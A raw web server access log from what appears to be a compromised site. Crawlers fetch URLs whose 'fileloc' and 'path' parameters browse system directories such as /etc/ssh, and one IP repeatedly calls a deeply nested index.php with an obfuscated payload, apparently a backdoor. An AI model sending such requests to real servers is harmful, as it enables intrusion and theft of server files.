216.73.216.53 - - [04/Nov/2025:04:11:27 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FSSL_pending.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 16633 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:11:30 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2Fsort.3pm.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 18788 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [04/Nov/2025:04:08:38 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323139363931382p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323139333331382q6433303862333965646639356233646230336633656133623862323463333930222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [04/Nov/2025:04:11:33 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FSHA256_Final.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 18268 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:11:33 +1000] "GET /1327152?path=//usr/tmp HTTP/1.0" 200 14121 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:11:36 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FSSL_CTX_sessions.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 16474 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:11:37 +1000] "GET /1238800?path=//etc/ssl HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
45.227.253.15 - - [04/Nov/2025:04:11:38 +1000] "GET /index.php/jk HTTP/1.0" 200 43 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"
216.73.216.53 - - [04/Nov/2025:04:11:39 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FEVP_CIPHER_CTX_ctrl.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 29739 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:11:42 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2Fpcre16_free_substring.3.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 13222 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:11:45 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fopt%2Fphp53%2Fmods-available%2Fgeoip.ini&path=%2F%2Fopt%2Fphp53%2Fmods-available HTTP/1.0" 200 12411 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:11:46 +1000] "GET /1060848?path=//etc/egl HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:11:48 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fsnmp%2Fmibs%2FSNMP-NOTIFICATION-MIB.txt&path=%2F%2Fusr%2Fshare%2Fsnmp%2Fmibs HTTP/1.0" 200 32994 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:11:51 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FCRYPTO_lock.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 20642 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:11:51 +1000] "GET /1273664?path=//etc/ssh HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [04/Nov/2025:04:09:01 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323139363934312p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323139333334312q3362346330653139376230333432656338643231313536386566646132333461222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [04/Nov/2025:04:11:54 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FEVP_DigestInit.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 21998 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:11:57 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fopt%2Fphp53%2Fmods-available%2Fmbstring.ini&path=%2F%2Fopt%2Fphp53%2Fmods-available HTTP/1.0" 200 12417 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:12:00 +1000] "GET /1288272?path=//lib/gcc HTTP/1.0" 200 14075 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
114.119.156.46 - - [04/Nov/2025:04:11:59 +1000] "GET /2439058272?path=/home/region-gk.ru/data/www/new.region-gk.ru/.tmb HTTP/1.0" 200 14558 "https://region-logist.ru/2439058272?shopdetail=2436182873" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
94.154.35.236 - - [04/Nov/2025:04:11:59 +1000] "GET /%D0%90%D1%80%D1%85%D0%B8%D0%B2.tar.gz HTTP/1.0" 200 62019 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36"
216.73.216.53 - - [04/Nov/2025:04:12:03 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FASN1_TIME_adj.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 19003 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:12:06 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FEVP_PKEY_print_public.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 17050 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:12:08 +1000] "GET /1310336?path=//etc/udev HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:12:09 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2Fsetexeccon_raw.3.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 12490 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:12:12 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fopt%2Fphp73%2Fmods-available%2Fgeoip.ini&path=%2F%2Fopt%2Fphp73%2Fmods-available HTTP/1.0" 200 12411 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:12:15 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FSSL_set_bio.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 16451 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:12:16 +1000] "GET /1431936?path=//etc/rpm HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:12:18 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FPEM_read_bio_DHparams.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 24318 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [04/Nov/2025:04:09:24 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323139363936342p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323139333336342q6234643234343232653338323932626632303131363833323033616363353466222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [04/Nov/2025:04:12:21 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fopt%2Fphp73%2Fmods-available%2Fmbstring.ini&path=%2F%2Fopt%2Fphp73%2Fmods-available HTTP/1.0" 200 12417 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:12:24 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FSSL_CTX_set1_chain.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 19683 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:12:25 +1000] "GET /1521136?path=//usr/tmp HTTP/1.0" 200 14121 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:12:27 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FDB.3pm.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 20932 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:12:30 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fusr%2Fshare%2Fzoneinfo%2Fposix%2FArctic HTTP/1.0" 200 14397 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:12:33 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FBN_set_bit.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 17015 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:12:35 +1000] "GET /1307744?path=//sys/bus HTTP/1.0" 200 53163 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:12:36 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2Fhome%2Ftemp%2Fregion%2Fnew.region-gk.ru%2Fwp-admin%2Finstall.php&path=%2Fhome%2Ftemp%2Fregion%2Fnew.region-gk.ru%2Fwp-admin HTTP/1.0" 200 34951 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:12:39 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fvar%2Fwww%2Fbk%2F100%2Fajax%2Ffeedback_contact.php&path=%2F%2Fvar%2Fwww%2Fbk%2F100%2Fajax HTTP/1.0" 200 13008 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:12:42 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FEVP_SignFinal.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 18492 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [04/Nov/2025:04:09:50 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323139363939302p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323139333339302q6638363930366565336130373764353734623161653836653031386637366165222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [04/Nov/2025:04:12:45 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2Fgetpeercon_raw.3.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 12482 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:12:45 +1000] "GET /1559344?path=//var/opt HTTP/1.0" 200 12719 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:12:48 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2Fsecurity_getenforce.3.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 13278 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:12:51 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fopt%2Fphp71%2Fmods-available%2Fpcntl.ini&path=%2F%2Fopt%2Fphp71%2Fmods-available HTTP/1.0" 200 12411 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:12:54 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FBIO_get_num_renegotiates.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 22541 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:12:57 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2Fhome%2Ftemp%2Fregion%2Fnew.region-gk.ru%2Fwp-admin%2Fpress-this.php&path=%2Fhome%2Ftemp%2Fregion%2Fnew.region-gk.ru%2Fwp-admin HTTP/1.0" 200 15439 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:12:59 +1000] "GET /1455296?path=//etc/opt HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:13:00 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2Fd2i_CMS_ContentInfo.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 16209 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:13:03 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FBIO_new_file.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 18731 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:13:06 +1000] "GET /1401024?path=//etc/yum HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [04/Nov/2025:04:10:14 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323139373031342p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323139333431342q6363336538386562356263666162393533376636323436383963666632376438222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [04/Nov/2025:04:13:09 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FEVP_VerifyFinal.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 18346 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:13:12 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2Fpcre16_exec.3.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 15138 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:13:15 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2Fhome%2Ftemp%2Fregion%2Fnew.region-gk.ru%2Fwp-admin%2Fimport.php&path=%2Fhome%2Ftemp%2Fregion%2Fnew.region-gk.ru%2Fwp-admin HTTP/1.0" 200 22040 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:13:16 +1000] "GET /1499264?path=//etc/egl HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:13:18 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FPEM_write_X509_CRL.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 24315 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:13:21 +1000] "GET /1032016?path=//etc/rpm HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:13:21 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2Fselinux_status_updated.3.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 12513 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:13:24 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2Ffsetfilecon_raw.3.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 12491 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:13:27 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fusr%2Fshare%2Fzoneinfo%2Fposix%2FChile HTTP/1.0" 200 15893 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:13:29 +1000] "GET /1353104?path=//etc/egl HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [04/Nov/2025:04:10:39 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323139373033392p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323139333433392q3065383335366333393135316334616435306166623731643936336133356138222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [04/Nov/2025:04:13:33 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2Fsetfilecon_raw.3.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 12490 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:13:36 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FSSL_CTX_new.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 18961 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:13:39 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fopt%2Fphp70%2F.registry%2Fstructures_graph.reg&path=%2F%2Fopt%2Fphp70%2F.registry HTTP/1.0" 200 27794 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:13:39 +1000] "GET /1466864?path=//var/lib HTTP/1.0" 200 59851 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:13:42 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2Favc_netlink_release_fd.3.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 12514 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
114.119.156.46 - - [04/Nov/2025:04:13:43 +1000] "GET /2439058272?path=/home/region-gk.ru/data/www/new.region-gk.ru HTTP/1.0" 200 62019 "https://region-logist.ru/2439058272?shopdetail=2436182873" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
